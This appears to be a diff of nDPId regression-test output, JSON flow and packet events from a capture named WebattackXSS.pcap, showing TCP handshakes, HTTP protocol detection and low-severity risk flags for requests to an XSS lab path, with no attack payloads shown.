-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348083715,"flow_last_seen":1499348088922,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348086300,"flow_last_seen":1499348091923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348086300,"flow_last_seen":1499348091923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348087568,"flow_last_seen":1499348092924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35830,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348087568,"flow_last_seen":1499348092924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348090129,"flow_last_seen":1499348095924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35856,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348090129,"flow_last_seen":1499348095924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348091413,"flow_last_seen":1499348096924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35870,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348091413,"flow_last_seen":1499348096924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348092675,"flow_last_seen":1499348097925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348092675,"flow_last_seen":1499348097925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348095258,"flow_last_seen":1499348095259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35910,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348095258,"flow_last_seen":1499348095259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348096595,"flow_last_seen":1499348096595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35924,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348096595,"flow_last_seen":1499348096595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348099359,"flow_last_seen":1499348099360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1499348099359,"flow_last_seen":1499348099360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347939286,"flow_last_seen":1499348006339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232672,"flow_avg_l4_payload_len":748,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935283,"flow_last_seen":1499346935283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935283,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1499346935283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wadAAD4GBCmsEAABwKgKMsuCAFAodgngAAAAAKACchCXWwAAAgQFtAQCCAoBOMhHAAAAAAEDAwc="} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1499346935283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy4I5j3VaKHYJ4aAScSBLsAAAAgQFtAQCCAoD4pm+ATjIRwEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1499346935285,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935285,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wahAAD4GBDCsEAABwKgKMsuCAFAodgnhOY91W4AQAOXqtwAAAQEICgE4yEcD4pm+"} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346935283,"flow_last_seen":1499346935285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346935285,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935343,"flow_last_seen":1499346935343,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935343,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1499346935343,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935343,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IaBAAD4GpDCsEAABwKgKMsuEAFAW1en2AAAAAKACchDI1AAAAgQFtAQCCAoBOMhWAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1499346935343,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935343,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy4Rgmy17FtXp96AScSCd7QAAAgQFtAQCCAoD4pnNATjIVgEDAwc="} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1499346935343,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935343,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IaFAAD4GpDesEAABwKgKMsuEAFAW1en3YJstfIAQAOU89QAAAQEICgE4yFYD4pnN"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935650,"flow_last_seen":1499346935650,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1499346935650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935650,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZwtAAD4GXsWsEAABwKgKMsuWAFCoJa+oAAAAAKACchBxcwAAAgQFtAQCCAoBOMijAAAAAAEDAwc="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935650,"flow_last_seen":1499346935650,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1499346935650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935650,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/9xAAD4GxfOsEAABwKgKMsuYAFCG7Dd\/AAAAAKACchAK1AAAAgQFtAQCCAoBOMijAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1499346935650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935650,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy5YT3KepqCWvqaAScSAY0AAAAgQFtAQCCAoD4poaATjIowEDAwc="} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1499346935650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935650,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy5hHE6nghuw3gKAScSB8wgAAAgQFtAQCCAoD4poaATjIowEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1499346935651,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935651,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZwxAAD4GXsysEAABwKgKMsuWAFCoJa+pE9ynqoAQAOW31wAAAQEICgE4yKMD4poa"} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1499346935651,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935651,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/91AAD4GxfqsEAABwKgKMsuYAFCG7DeARxOp4YAQAOUbygAAAQEICgE4yKMD4poa"} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346956870,"flow_last_seen":1499346956870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346956870,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1499346956870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956870,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DqpAAD4GtyasEAABwKgKMsvoAFDxddP2AAAAAKACchDuyQAAAgQFtAQCCAoBON1cAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1499346956870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956870,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy+g57n8P8XXT96AScSCD9QAAAgQFtAQCCAoD4q7TATjdXAEDAwc="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1499346956871,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346956871,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DqtAAD4Gty2sEAABwKgKMsvoAFDxddP3Oe5\/EIAQAOUi\/QAAAQEICgE43VwD4q7T"} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346956870,"flow_last_seen":1499346956871,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346956871,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346956932,"flow_last_seen":1499346956932,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346956932,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1499346956932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956932,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nj9AAD4GJ5GsEAABwKgKMsvqAFAHDkNUAAAAAKACchBpwwAAAgQFtAQCCAoBON1rAAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1499346956932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956932,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy+qiErzRBw5DVaAScSBY+QAAAgQFtAQCCAoD4q7iATjdawEDAwc="} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1499346956933,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346956933,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nkBAAD4GJ5isEAABwKgKMsvqAFAHDkNVohK80oAQAOX4AAAAAQEICgE43WsD4q7i"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346957283,"flow_last_seen":1499346957283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346957283,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 